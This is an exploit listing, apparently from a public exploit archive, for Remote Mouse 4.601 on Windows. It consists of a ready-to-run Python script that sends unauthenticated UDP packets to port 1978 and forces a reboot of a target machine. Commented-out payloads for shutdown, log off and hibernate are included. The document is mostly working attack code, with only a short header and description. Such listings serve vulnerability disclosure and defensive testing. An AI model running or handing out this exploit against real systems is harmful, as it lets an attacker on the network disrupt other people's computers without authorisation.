# Exploit Title: Remote Mouse 4.601 - Remote Power Control (Shutdown/Reboot/Logoff) # Date: 14/07/2025 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.remotemouse.net # Software Link: https://www.remotemouse.net/downloads # Version: 4.601 (Windows) # Tested on: Windows 10 / Windows 11 # CVE: Pending ''' Description: Remote Mouse 4.601 for Windows is vulnerable to unauthenticated remote power control due to improper access controls on UDP port 1978. An attacker on the same network can send specially crafted packets to force shutdown, restart, or log off the target system without authentication. ''' import socket import time def send_udp(payload, ip, port=1978): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload.encode(), (ip, port)) sock.close() def build_payload(prefix, command): return f"{prefix}{len(command):03d}{command}" def exploit(ip): send_udp(build_payload("mpr", "1"), ip) # Reboot (1 = -r -t 0) # send_udp(build_payload("mpr", "2"), ip) # Shutdown (2 = -s -t 0) # send_udp(build_payload("mpr", "3"), ip) # Log off (3 = -l) # send_udp(build_payload("mpr", "4"), ip) # Hibernate (4 = -h) time.sleep(2) if __name__ == "__main__": TARGET_IP = "192.168.1.152" exploit(TARGET_IP)